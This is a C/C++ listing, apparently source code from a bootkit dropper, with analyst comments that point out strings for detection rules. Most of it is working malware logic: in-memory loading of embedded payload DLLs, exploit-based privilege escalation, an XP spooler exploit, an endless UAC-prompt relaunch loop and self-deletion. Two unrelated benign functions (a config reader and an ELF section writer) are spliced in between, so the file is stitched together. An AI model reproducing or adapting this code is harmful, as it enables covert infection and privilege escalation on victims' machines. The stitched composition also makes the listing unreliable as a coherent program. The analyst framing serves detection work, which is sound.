// Analyst note: this routine stages a second-stage module entirely in memory.
// It reads the bytes of the embedded "BKDROPER_PLUG" section, maps them with
// MemoryLoadLibrary (presumably a MemoryModule-style loader that maps a PE
// image straight from a buffer, so no module file is written here), resolves
// the export "BkInstall" by name, calls it, and on a non-zero result calls
// MultiMethodReboot() (presumably a reboot attempt by several methods; its
// body is not in this listing). Each PP_RETURNIF1 presumably returns early
// when its condition holds, so the function silently does nothing if the
// section is absent or empty, the in-memory load fails, or the export is
// missing. Strings a detection rule can anchor on: "BKDROPER_PLUG",
// "BkInstall", and the PP_DPRINTF debug messages below.
void RunBkDrop()
{
    DWORD loader_dll_body_size = 0;
    void * loader_dll_body = NULL;
    PP_DPRINTF(L"RunBkDrop: started.");
    // Locate the embedded payload section; its size comes back through the out-parameter.
    loader_dll_body = GetSectionData("BKDROPER_PLUG", &loader_dll_body_size);
    PP_RETURNIF1(loader_dll_body == NULL);
    PP_RETURNIF1(loader_dll_body_size == 0);
    PP_DPRINTF(L"RunBkDrop: GetSectionData() result body=%X. size=%d", loader_dll_body, loader_dll_body_size );
    // Map the section bytes as a module without a file on disk (in-memory loader).
    HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body);
    PP_RETURNIF1(loader_dll == NULL);
    typedef BOOL (WINAPI * BkInstallFunction)();
    BkInstallFunction bkinstall = NULL;
    // Export lookup by name inside the in-memory module.
    bkinstall = (BkInstallFunction)MemoryGetProcAddress(loader_dll, "BkInstall");
    PP_RETURNIF1(bkinstall == NULL);
    BOOL bkinstall_result = bkinstall();
    PP_DPRINTF(L"RunBkDrop: finished with bkinstall_result=%d.", bkinstall_result);
    // Only a successful install triggers the reboot path.
    if (bkinstall_result) MultiMethodReboot();
}
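/**
 * @brief Returns a heap copy of the BLOB stored under @p strSectionName in the
 *        currently selected project's configuration.
 * @param lpData         [out] receives a buffer allocated with new[]; the caller
 *                       owns it and must release it with delete[]. Left untouched
 *                       when the function returns FALSE.
 * @param nStreamLength  [out] receives the BLOB length in bytes. Left untouched
 *                       when the function returns FALSE.
 * @param strSectionName name of the configuration section to read.
 * @return TRUE when the section was found and copied, FALSE when the
 *         configuration is not loaded or the section could not be read.
 * @throws std::bad_alloc if the copy cannot be allocated (new[] throws; it does
 *         not return nullptr).
 *
 * Fix: the original guard was `(m_bConfigInfoLoaded == TRUE) && (bRetVal == TRUE)`
 * with bRetVal initialised to FALSE just above it, so the whole body was
 * unreachable and the function always returned FALSE without producing data.
 * The dead `pbNewDat != nullptr` branch and its empty else were dropped for the
 * same reason.
 */
BOOL CConfigData::bGetData(void*& lpData, int& nStreamLength, std::string strSectionName)
{
    BOOL bRetVal = FALSE;
    // is the configuration loaded?
    if (m_bConfigInfoLoaded == TRUE)
    {
        SECTIONDATA tempSecData;
        tempSecData.m_omSectionName = strSectionName;
        bRetVal = GetSectionData(m_strCurrProjName, tempSecData.m_omSectionName, tempSecData);
        if (bRetVal != FALSE)
        {
            // Hand the caller its own copy so it does not alias the cached section data.
            BYTE* pbNewDat = new BYTE[tempSecData.m_nBLOBLen];
            memcpy(pbNewDat, tempSecData.m_bBLOB, tempSecData.m_nBLOBLen);
            nStreamLength = tempSecData.m_nBLOBLen;
            lpData = static_cast<void*>(pbNewDat);
        }
    }
    return bRetVal;
}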
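/**
 * @brief Overwrites part of a section's in-memory data with the bytes in @p buffer.
 * @param section_index index of the target section, passed through to GetSectionData().
 * @param offset        byte offset inside the section at which the write starts.
 * @param buffer        source bytes; must hold at least *buffer_size bytes.
 * @param buffer_size   [in] number of bytes to write. Not modified.
 * @return true when the section is available and the whole range fits inside it
 *         (the bytes were copied); false otherwise, with no write performed.
 *
 * Fix: the original range check `offset + *buffer_size <= section_size` can wrap
 * around size_t for a large offset and then pass, letting memcpy write past the
 * end of the section buffer. The check below is written without the addition so
 * it cannot overflow. section_size is also zero-initialised and the pointer
 * arguments are validated before use.
 */
bool CELFFile::WriteSectionData(int section_index, size_t offset, unsigned char* buffer, unsigned long* buffer_size)
{
    if (buffer == NULL || buffer_size == NULL)
    {
        return false;
    }
    size_t section_size = 0;
    char* section_buffer = reinterpret_cast<char*>(GetSectionData(section_index, &section_size));
    if (section_buffer == NULL)
    {
        return false;
    }
    const size_t write_len = *buffer_size;
    // Equivalent to offset + write_len <= section_size, but overflow-free.
    if (write_len > section_size || offset > section_size - write_len)
    {
        return false;
    }
    memcpy(section_buffer + offset, buffer, write_len);
    return true;
}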
// Analyst note: same in-memory loading pattern as RunBkDrop(), this time for
// the embedded "LOADER_DLL" section. The bytes are mapped with
// MemoryLoadLibrary (presumably a MemoryModule-style loader that maps a PE
// image straight from a buffer, so nothing is written to disk in this
// function), the export "LoadPlugToCache" is resolved by name and called once
// with the argument 0, and its BOOL result is only logged. The "12x_d" step
// reports appear to be the sample's own progress reporting
// (DebugReportStepByName; not in this listing). Each PP_RETURNIF1 presumably
// returns early when its condition holds. Strings a detection rule can anchor
// on: "LOADER_DLL", "LoadPlugToCache", the step ids "120_d"/"121_d"/"122_d".
void DownloadPlugByLoaderDll()
{
    DWORD loader_dll_body_size = 0;
    void * loader_dll_body = NULL;
    PP_DPRINTF(L"DownloadPlugByLoaderDll: started.");
    // 120_d: loading Loader_dll
    PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("120_d"));
    loader_dll_body = GetSectionData("LOADER_DLL", &loader_dll_body_size);
    PP_RETURNIF1(loader_dll_body == NULL);
    PP_RETURNIF1(loader_dll_body_size == 0);
    // Map the section bytes as a module without a file on disk (in-memory loader).
    HMEMORYMODULE loader_dll = MemoryLoadLibrary(loader_dll_body);
    PP_RETURNIF1(loader_dll == NULL);
    // 121_d: Loader_dll loaded successfully
    PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("121_d"));
    typedef BOOL (WINAPI* LoadPlugToCacheFunction)(DWORD);
    LoadPlugToCacheFunction load_plug_to_cache = NULL;
    // Export lookup by name inside the in-memory module.
    load_plug_to_cache = (LoadPlugToCacheFunction)MemoryGetProcAddress(loader_dll, "LoadPlugToCache");
    PP_RETURNIF1(load_plug_to_cache == NULL);
    // 122_d: about to call LoadPlugin
    PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("122_d"));
    // The meaning of the 0 argument is not visible in this listing.
    BOOL load_plug_result = load_plug_to_cache(0);
    PP_DPRINTF(L"DownloadPlugByLoaderDll: finished with load_plug_result=%d.", load_plug_result);
}
// Function that is called when injected into other processes.
// Checks its own privileges and tries to extend them (the original comment breaks off here).
//
// Analyst note: this is the escalation/installation driver of the dropper as
// visible in the code below. In order it: (1) calls UnhookDlls() and
// BuildImport() to set up its own imports; (2) when IsUserAdmin() is false,
// calls TakePrivileges() and runs ExplorerMain() unless that returned 0 or 2;
// (3) if it started as admin and the first ExplorerMain() failed, tries
// TakePrivileges() + ExplorerMain() once more; (4) on an OS with
// dwMajorVersion == 5 (the original comment says XP) and when the image is
// not a DLL, writes the "DROPER_DLL" section to a temp file and passes the
// path to SpoolerBypass(); (5) if still not installed, repeatedly copies
// FileToDelete to "<tempdir>\<DROPER_NAME_PREFIX><tempname>.exe" next to a
// ".manifest" sidecar and launches it through ShellExecuteExA up to 10 times,
// and repeats the whole copy/launch cycle until PathBkFile exists on disk;
// (6) calls ExplorerMain() a third time; (7) starts DeleteDropper on its own
// thread and, when dwExplorerSelf is set, terminates the process.
// FileToDelete, PathBkFile, dwExplorerSelf and ARGV_UAC_RUN are defined
// outside this listing; lpData is never read. For detection purposes the
// on-disk artifacts visible here are the prefixed .exe copies and their
// .manifest sidecars in the temp directory, the temp file handed to
// SpoolerBypass(), and the PP_DPRINTF debug strings.
DWORD WINAPI ExplorerRoutine( LPVOID lpData )
{
  //
  // Create a separate thread for deletion, because the dropper may take more than a minute to delete itself.
  //
  BOOL bRun = TRUE;            // cleared when TakePrivileges() returns 0 or 2
  BOOL bRet = FALSE;           // result of the most recent ExplorerMain() call
  BOOL IsUsedExploit = FALSE;  // set once TakePrivileges() has been attempted
  OSVERSIONINFOEXA OSVer = {sizeof(OSVer), 0};
  UnhookDlls();
  BuildImport((PVOID)GetImageBase());
  PP_DPRINTF(L"ExplorerRoutine: started");
  if (! IsUserAdmin() )
  {
    PP_DPRINTF(L"ExplorerRoutine: user is not admin. Trying to take privileges.");
    // Return values 0 and 2 stop the run; any other value lets it proceed.
    switch ( TakePrivileges() )
    {
      case 0:
      case 2:
        bRun = FALSE;
        break;
    };
    PP_DPRINTF(L"ExplorerRoutine: TakePrivile result=%d", bRun);
    IsUsedExploit = TRUE; // In theory this is always TRUE
  };
  if ( bRun )
  {
    PP_DPRINTF(L"ExplorerRoutine: run ExplorerMain");
    bRet = ExplorerMain();
    PP_DPRINTF(L"ExplorerRoutine: ExplorerMain() result=%d", bRet);
  }
  /* If we have admin rights but did not use exploits and the install failed,
     use exploits and retry the install */
  if ( (bRet == FALSE) && (bRun == TRUE) && (IsUsedExploit == FALSE) )
  {
    PP_DPRINTF(L"ExplorerRoutine: Trying again to take privileges");
    IsUsedExploit = TRUE;
    switch ( TakePrivileges() )
    {
      case 0:
      case 2:
        bRun = FALSE;
        break;
    };
    if ( bRun )
    {
      PP_DPRINTF(L"ExplorerRoutine: Second call of ExplorerMain");
      bRet = ExplorerMain();
      PP_DPRINTF(L"ExplorerRoutine: Second ExplorerMain() result=%d", bRet);
    }
  };
  pGetVersionExA(&OSVer);
  /* Drop the DLL to disk and use the spooler exploit, XP only */
  if ( (! bRet) && (PEFile::IsDll((PVOID)GetImageBase()) == FALSE) && (OSVer.dwMajorVersion == 5))
  {
    PP_DPRINTF(L"ExplorerRoutine: Trying to use XP spooler exploit");
    DWORD DropSize = 0;
    PVOID DropImage = GetSectionData("DROPER_DLL",&DropSize);
    if ( DropImage && DropSize)
    {
      // On-disk artifact: the embedded section written under a fresh temp-file name.
      PCHAR DropFile = File::GetTempNameA();
      File::WriteBufferA(DropFile,DropImage,DropSize);
      SpoolerBypass(DropFile);
      STR::Free(DropFile);
    };
  };
  /* Launch a copy of the dropper many times, asking for elevated rights. */
  if ( bRet == FALSE )
  {
    PP_DPRINTF(L"ExplorerRoutine: start UAC asking cycle");
    PCHAR tmpexe,dir,file ;
    PCHAR tmp_manifest;
    PCHAR NamePrefix = GetSectionAnsiString("DROPER_NAME_PREFIX");
    if ( NamePrefix )
      do
      {
        tmpexe = File::GetTempNameA();
        tmp_manifest = STR::Alloc(MAX_PATH+1);
        dir = (tmpexe != NULL)? File::ExtractFilePath(tmpexe) : NULL ;
        file = (tmpexe != NULL)? File::ExtractFileName(tmpexe) : NULL ;
        if ( tmp_manifest && dir && file)
        {
          // Rebuild the temp name as "<dir>\<NamePrefix><file>.exe" and derive
          // the ".manifest" sidecar path from it.
          STR::Free(tmpexe);
          tmpexe = STR::New(5,dir,"\\",NamePrefix,file,".exe");
          if ( ! tmpexe ) return 0;
          m_lstrcpy(tmp_manifest,tmpexe);
          m_lstrcat(tmp_manifest,".manifest");
        };
        if ( tmpexe && tmp_manifest )
          if ( pCopyFileA(FileToDelete,tmpexe,FALSE) && SaveManifest(tmp_manifest) )
          {
            DWORD dwCode = -1;
            SHELLEXECUTEINFOA ExecInfo;
            // tmp_manifest is reused here as the parameter string "<tmpexe> <ARGV_UAC_RUN>".
            m_lstrcpy(tmp_manifest,tmpexe);
            m_lstrcat(tmp_manifest," ");
            m_lstrcat(tmp_manifest,ARGV_UAC_RUN);
            ExecInfo.cbSize = sizeof(ExecInfo);
            ExecInfo.lpFile = tmpexe;
            ExecInfo.lpParameters = tmp_manifest;
            ExecInfo.fMask = SEE_MASK_NOCLOSEPROCESS;
            // Up to 10 synchronous launches; stops at the first exit code 0
            // or the first ShellExecuteExA failure.
            for ( int i = 0; i < 10; ++i )
            {
              PP_DPRINTF(L"ExplorerRoutine: asking UAC for '%S'", tmp_manifest);
              if ( pShellExecuteExA(&ExecInfo) == FALSE ) break;
              pWaitForSingleObject(ExecInfo.hProcess,INFINITE);
              pGetExitCodeProcess(ExecInfo.hProcess,&dwCode);
              if ( dwCode == 0 )
              {
                PP_DPRINTF(L"ExplorerRoutine: UAC allowed for '%S'", tmp_manifest);
                break;
              }
            }
          };
        if ( tmpexe ) STR::Free(tmpexe);
        if ( tmp_manifest ) STR::Free(tmp_manifest);
        if ( dir ) STR::Free(dir);
        if ( file ) STR::Free(file);
        // No iteration cap on this loop: it ends only when PathBkFile exists.
      } while ( ( (DWORD)pGetFileAttributesA(PathBkFile) == INVALID_FILE_ATTRIBUTES) ); // end do: loop until the bootkit file appears
    if ( NamePrefix ) STR::Free(NamePrefix);
  };
  /* If the install was unsuccessful, try again - maybe we get lucky */
  if ( bRet == FALSE)
  {
    PP_DPRINTF(L"ExplorerRoutine: Third call of ExplorerMain");
    bRet = ExplorerMain();
    PP_DPRINTF(L"ExplorerRoutine: Third ExplorerMain() result=%d", bRet);
  }
  /* Delete the dropper */
  PP_DPRINTF(L"ExplorerRoutine: Start to delete droper");
  // Self-deletion runs on a separate thread (see the comment at the top); the
  // thread handle is closed immediately, so this function never waits for it.
  pCloseHandle(StartThread(DeleteDropper,NULL));
  if ( dwExplorerSelf )
  {
    PP_DPRINTF(L"ExplorerRoutine: dwExplorerSelf is true. Call ExitProcess()");
    pExitProcess(0);
  }
  return 0;
}